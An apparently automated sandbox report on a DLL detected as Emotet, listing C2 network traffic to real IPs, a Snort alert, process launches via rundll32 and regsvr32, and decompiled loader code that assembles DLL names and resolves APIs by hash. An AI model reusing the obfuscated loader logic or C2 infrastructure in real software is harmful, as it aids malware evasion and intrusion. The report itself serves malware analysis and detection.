DllRegisterServer	1	0x1000373c

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2017
InternalName	BaseDLG_MFC
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	Aplicacin BaseDLG_MFC
ProductVersion	1, 0, 0, 1
FileDescription	Aplicacin MFC BaseDLG_MFC
OriginalFilename	BaseDLG_MFC.EXE
Translation	0x0c0a 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.451.91.76.894977280802404336 05/22/22-04:19:01.586576	TCP	2404336	ET CNC Feodo Tracker Reported CnC Server TCP group 19	49772	8080	192.168.2.4	51.91.76.89

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2022 04:18:39.912916899 CEST	49760	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:39.912969112 CEST	443	49760	70.36.102.35	192.168.2.4
May 22, 2022 04:18:39.913057089 CEST	49760	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:39.933507919 CEST	49760	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:39.933548927 CEST	443	49760	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.108227968 CEST	443	49760	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.111500978 CEST	49761	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.111565113 CEST	443	49761	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.111655951 CEST	49761	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.114217997 CEST	49761	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.114252090 CEST	443	49761	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.288639069 CEST	443	49761	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.294924021 CEST	49762	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.294995070 CEST	443	49762	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.295104027 CEST	49762	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.295417070 CEST	49762	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.295501947 CEST	443	49762	70.36.102.35	192.168.2.4
May 22, 2022 04:18:40.295588970 CEST	49762	443	192.168.2.4	70.36.102.35
May 22, 2022 04:18:40.350404024 CEST	49763	8080	192.168.2.4	92.240.254.110
May 22, 2022 04:18:43.504540920 CEST	49763	8080	192.168.2.4	92.240.254.110
May 22, 2022 04:18:49.520706892 CEST	49763	8080	192.168.2.4	92.240.254.110
May 22, 2022 04:19:01.586575985 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:01.608715057 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:01.608875036 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:01.609694004 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:01.631812096 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:01.652501106 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:01.652540922 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:01.652781010 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:03.608061075 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:03.629477978 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:03.629625082 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:03.634684086 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:03.698524952 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:03.922393084 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:03.922971964 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:06.922677040 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:06.922748089 CEST	8080	49772	51.91.76.89	192.168.2.4
May 22, 2022 04:19:06.922862053 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:19:06.923182011 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:20:29.818345070 CEST	49772	8080	192.168.2.4	51.91.76.89
May 22, 2022 04:20:29.818391085 CEST	49772	8080	192.168.2.4	51.91.76.89

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2022 04:21:42.194034100 CEST	61486	53	192.168.2.4	8.8.8.8
May 22, 2022 04:21:43.744360924 CEST	61497	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 22, 2022 04:21:42.194034100 CEST	192.168.2.4	8.8.8.8	0xde9c	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)
May 22, 2022 04:21:43.744360924 CEST	192.168.2.4	8.8.8.8	0x51c7	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 22, 2022 04:21:42.221522093 CEST	8.8.8.8	192.168.2.4	0xde9c	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
May 22, 2022 04:21:43.781708002 CEST	8.8.8.8	192.168.2.4	0x51c7	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 1212, Parent PID: 5692

General

Target ID:	0
Start time:	04:18:19
Start date:	22/05/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll"
Imagebase:	0xae0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 796, Parent PID: 1212

General

Target ID:	1
Start time:	04:18:20
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1
Imagebase:	0x1190000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1460, Parent PID: 1212

General

Target ID:	2
Start time:	04:18:20
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\FC6cLk6kKz.dll
Imagebase:	0x890000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6064, Parent PID: 796

General

Target ID:	3
Start time:	04:18:20
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1
Imagebase:	0x950000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3340, Parent PID: 1212

General

Target ID:	4
Start time:	04:18:20
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\FC6cLk6kKz.dll,DllRegisterServer
Imagebase:	0x950000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2344, Parent PID: 1460

General

Target ID:	5
Start time:	04:18:25
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf"
Imagebase:	0x890000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1016, Parent PID: 564

General

Target ID:	9
Start time:	04:18:39
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2188, Parent PID: 564

General

Target ID:	10
Start time:	04:18:39
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5140, Parent PID: 564

General

Target ID:	11
Start time:	04:18:40
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3264, Parent PID: 564

General

Target ID:	12
Start time:	04:18:41
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SgrmBroker.exePID: 4832, Parent PID: 564

General

Target ID:	13
Start time:	04:18:42
Start date:	22/05/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff71be70000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5248, Parent PID: 564

General

Target ID:	14
Start time:	04:18:42
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5780, Parent PID: 564

General

Target ID:	15
Start time:	04:18:43
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4764, Parent PID: 564

General

Target ID:	16
Start time:	04:18:44
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2012, Parent PID: 564

General

Target ID:	17
Start time:	04:18:56
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1236, Parent PID: 564

General

Target ID:	19
Start time:	04:19:19
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3368, Parent PID: 564

General

Target ID:	22
Start time:	04:19:37
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MpCmdRun.exePID: 5612, Parent PID: 5248

General

Target ID:	24
Start time:	04:19:43
Start date:	22/05/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff678970000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6140, Parent PID: 5612

General

Target ID:	25
Start time:	04:19:43
Start date:	22/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5748, Parent PID: 564

General

Target ID:	27
Start time:	04:19:50
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4624, Parent PID: 564

General

Target ID:	32
Start time:	04:21:42
Start date:	22/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -s W32Time
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 1212, Parent PID: 5692COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.3%
Total number of Nodes:	458
Total number of Limit Nodes:	17

Executed Functions

Function 100042F6 Relevance: 133.6, APIs: 46, Strings: 30, Instructions: 598
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E100042F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v4;
				int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				int _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				int _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				struct HINSTANCE__* _v80;
				signed int _v84;
				int _v88;
				void* _v92;
				signed int _t177;
				int _t183;
				int _t185;
				intOrPtr _t277;
				struct HRSRC__* _t278;
				long _t280;
				signed int _t285;
				long _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t298;
				short* _t312;
				void* _t314;
				void* _t321;
				short* _t326;
				signed int _t330;
				void* _t334;
				intOrPtr _t338;

				_t322 = __esi;
				_t319 = __edi;
				_t318 = __edx;
				_t314 = __ecx;
				_t311 = __ebx;
				_t330 =  &_v92;
				_t177 =  *0x10045580; // 0xe155dca3
				_v4 = _t177 ^ _t330;
				_v80 = _a4;
				_t336 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t183 = 1;
				} else {
					_t185 = E100036FA(__ebx, __esi, _t336);
					_t337 = _t185;
					if(_t185 != 0) {
						_push(0x10036c38);
						E10020633(__ebx, __edx, __edi, __esi, __eflags);
						_t183 = 0;
						__eflags = 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_t326 = L"xadqsavcbdfewescGADW";
						_t312 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						 *0x100440cc = _t185;
						 *0x100440d0 = _t185;
						 *0x100440d4 = _t185;
						 *0x100440dc = _t185;
						 *0x100440d8 = _t185;
						 *0x100440e0 = _t185;
						 *0x100440e4 = _t185;
						_v32 = 0x417;
						_v30 = 0x44e;
						_v28 = 0x451;
						_v26 = 0x43a;
						_v24 = 0x416;
						_v22 = 0x401;
						_v20 = 0x448;
						_v18 = 0x428;
						_v16 = 0x44e;
						_v14 = 0x41a;
						_v12 = 0x41f;
						_v10 = 0x441;
						_v8 = _t185;
						_v76 = 0x42a;
						_v74 = 0x442;
						_v72 = 0x423;
						_v70 = 0x44e;
						_v68 = 0x448;
						_v66 = 0x44f;
						_v64 = 0x42c;
						_v62 = 0x43b;
						_v60 = 0x442;
						_v58 = _t185;
						_v56 = 0x442;
						_v54 = 0x44a;
						_v52 = 0x43f;
						_v50 = 0x448;
						_v48 = 0x423;
						_v46 = 0x437;
						_v44 = 0x43d;
						_v42 = 0x43a;
						_v40 = 0x451;
						_v38 = 0x442;
						_v36 = _t185;
						 *((short*)(_t330 + 0x64 + GetCurrencyFormatW(_t185, 0x11d4, _t312, _t185, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6b;
						 *((short*)(_t330 + 0x66 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x60 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x72;
						 *((short*)(_t330 + 0x6a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6e;
						 *((short*)(_t330 + 0x6c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x6e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x70 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x33;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x32;
						 *((short*)(_t330 + 0x74 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x2e;
						 *((short*)(_t330 + 0x76 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x64;
						 *((short*)(_t330 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x38 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6e;
						 *((short*)(_t330 + 0x3a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x74;
						 *((short*)(_t330 + 0x3c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x3e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x42 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x44 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x4c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6d;
						 *((short*)(_t330 + 0x4e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x73;
						 *((short*)(_t330 + 0x50 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x76;
						 *((short*)(_t330 + 0x52 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x63;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x72;
						 *((short*)(_t330 + 0x56 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x74;
						 *((short*)(_t330 + 0x58 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x5a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x64;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						_v92 = E10001534(_t314, _t337, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2,  &_v32);
						_v84 = E10001534(_t314, _t337, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39,  &_v76);
						_v88 = E10001534(_t314, _t337, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82,  &_v56);
						 *0x10046a74 = E10001688(_t254, 0x4cba7001);
						 *0x10046a70 = E10001688(_v88, 0x4e026ffd);
						 *0x10046a64 = E10001688(_v88, 0xc066615c);
						 *0x10046a54 = E10001688(_v88, 0xdad370ab);
						 *0x10046a68 = E10001688(_v88, 0x3762b189);
						 *0x10046a80 = E10001688(_v88, 0x4ec2add7);
						 *0x10046a2c = E10001688(_v88, 0x4e6ab1d2);
						 *0x10046a30 = E10001688(_v92, 0x626d0ab3);
						 *0x10046a3c = E10001688(_v92, 0x491ca2f6);
						 *0x10046a58 = E10001688(_v92, 0x74860909);
						 *0x10046a50 = E10001688(_v92, 0x13c17412);
						 *0x10046a4c = E10001688(_v92, 0x4a42047a);
						 *0x10046a5c = E10001688(_v92, 0x4d093b11);
						 *0x10046a84 = E10001688(_v92, 0x1f051606);
						 *0x10046a40 = E10001688(_v92, 0xdd86ddbc);
						 *0x10046a38 = E10001688(_v84, 0x3ed46385);
						 *0x10046a7c = E10001688(_v92, 0x417f6a7d);
						 *0x10046a78 = E10001688(_v92, 0xb88a2b15);
						 *0x10046a60 = E10001688(_v92, 0x3fbe89a1);
						 *0x10046a34 = E10001688(_v92, 0xbcc9930d);
